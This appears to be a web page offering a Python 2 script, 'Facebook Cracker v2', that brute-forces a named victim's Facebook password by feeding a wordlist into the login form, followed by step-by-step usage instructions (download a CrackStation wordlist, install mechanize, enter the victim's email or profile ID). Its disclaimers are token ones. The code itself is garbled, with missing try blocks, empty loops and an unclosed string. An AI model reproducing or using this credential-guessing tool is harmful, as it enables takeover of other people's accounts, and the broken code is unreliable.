hack fb

hack fb




#Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall !

#This program is for educational purposes only.

#Don't attack people facebook accounts it's illegal !

#If you want to crack into someone's account, you must have the permission of the user.

#Mauritania Attacker is not responsible.



import sys

import random

import mechanize

import cookielib



GHT = '''


       |..........Facebook Cracker v 2.........|


       |#Author: Mauritania Attacker          |

       |#Contact: www.fb.com/mauritanie.forever|

       |#Date: 02/04/2013                     |

       |#This tool is made for pentesting.    |

       |#Changing the Description of this tool |

       |Won't made you the coder ^_^ !!!      |

       |#Respect Coderz ^_^                   |

       |#I take no responsibilities for the   |

       | use of this program !               |


       |..........Facebook Cracker v 2.........|



print "Note: - This tool can crack facebook account even if you don't have the email of your victim"

print "# Hit CTRL+C to quit the program"

print "# Use www.graph.facebook.com for more infos about your victim ^_^"



email = str(raw_input("# Enter |Email| |Phone number| |Profile ID number| |Username| : "))

passwordlist = str(raw_input("Enter the name of the password list file : "))


useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]




login = 'https://www.facebook.com/login.php?login_attempt=1'

def attack(password):



    sys.stdout.write("\r[*] trying %s.. " % password)


    br.addheaders = [('User-agent', random.choice(useragents))]

    site = br.open(login)





    br.form['email'] =email

    br.form['pass'] = password


    log = br.geturl()

    if log != login:

       print "\n\n\n [*] Password found .. !!"

       print "\n [*] Password : %s\n" % (password)


 except KeyboardInterrupt:

       print "\n[*] Exiting program .. "



def search():

   global password

   for password in passwords:





def check():


   global br

   global passwords


      br = mechanize.Browser()

      cj = cookielib.LWPCookieJar()






      br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

   except KeyboardInterrupt:

      print "\n[*] Exiting program ..\n"



      list = open(passwordlist, "r")

      passwords = list.readlines()

      k = 0

      while k < len(passwords):

         passwords[k] = passwords[k].strip()

         k += 1

   except IOError:

       print "\n [*] Error: check your password list path \n"


   except KeyboardInterrupt:

       print "\n [*] Exiting program ..\n"



       print GHT

       print " [*] Account to crack : %s" % (email)

       print " [*] Loaded :" , len(passwords), "passwords"

       print " [*] Cracking, please wait ..."

   except KeyboardInterrupt:

       print "\n [*] Exiting program ..\n"





   except KeyboardInterrupt:

       print "\n [*] Exiting program ..\n"



if __name__ == '__main__':



save above as facebook.py

download https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm


apt-get install python-mechanize

chmod +x facebook.py [*] root@root:~# python facebook.py

enter |Email| or |Phone number| or |Profile ID number| or |Username| of the victim

Now Give The "Path" Of Your CrackStation Word list 

Now it will try all passwords present in the word list, So relax and have a cup of coffee because it will take time depending on speed of your processor and password strength of your victim! 

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